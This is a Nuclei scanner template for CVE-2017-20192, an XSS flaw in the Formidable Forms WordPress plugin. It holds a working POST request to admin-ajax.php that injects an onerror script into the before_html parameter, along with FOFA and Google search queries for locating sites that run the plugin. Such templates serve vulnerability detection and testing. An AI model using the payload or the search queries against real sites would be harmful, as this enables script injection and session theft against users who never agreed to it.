Formidable Form Builder for WordPress versions before 2.05.03 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in form parameters like 'after_html', letting unauthenticated attackers inject and execute arbitrary scripts in victims' browsers
PoC代码[已公开]
id: CVE-2017-20192
info:
name: Formidable Forms < 2.05.02 - Cross-Site Scripting
author: 0xanis
severity: medium
description: |
Formidable Form Builder for WordPress versions before 2.05.03 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in form parameters like 'after_html', letting unauthenticated attackers inject and execute arbitrary scripts in victims' browsers
impact: |
Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
remediation: |
Update to version 2.05.03 or later.
reference:
- https://klikki.fi/formidable-forms-vulnerabilities/
- https://wordpress.org/plugins/formidable/
- https://nvd.nist.gov/vuln/detail/CVE-2017-20192
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-20192
epss-score: 0.29483
epss-percentile: 0.96444
cwe-id: CWE-79
cpe: cpe:2.3:a:strategy11:formidable_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="formidable" && body="wp-content/plugins"
google-query: inurl:"wp-content/plugins/formidable"
tags: cve,cve2017,wordpress,wp-plugin,formidable,xss,reflected,vkev
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=frm_forms_preview&before_html=<img src=x on[entry_key]error=alert(document.domain) />
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<img src=x onerror=alert(document.domain)")'
condition: and
# digest: 4b0a004830460221008b380e95de32831de1c15e5951f53c0b645b1353f251c38e9fea92d1917d16ac022100f0e8e6943dd11ddb98f965c491608b58ddc10de03698d943a22bd20b94649311:922c64590222798bb761d5b6d8e72950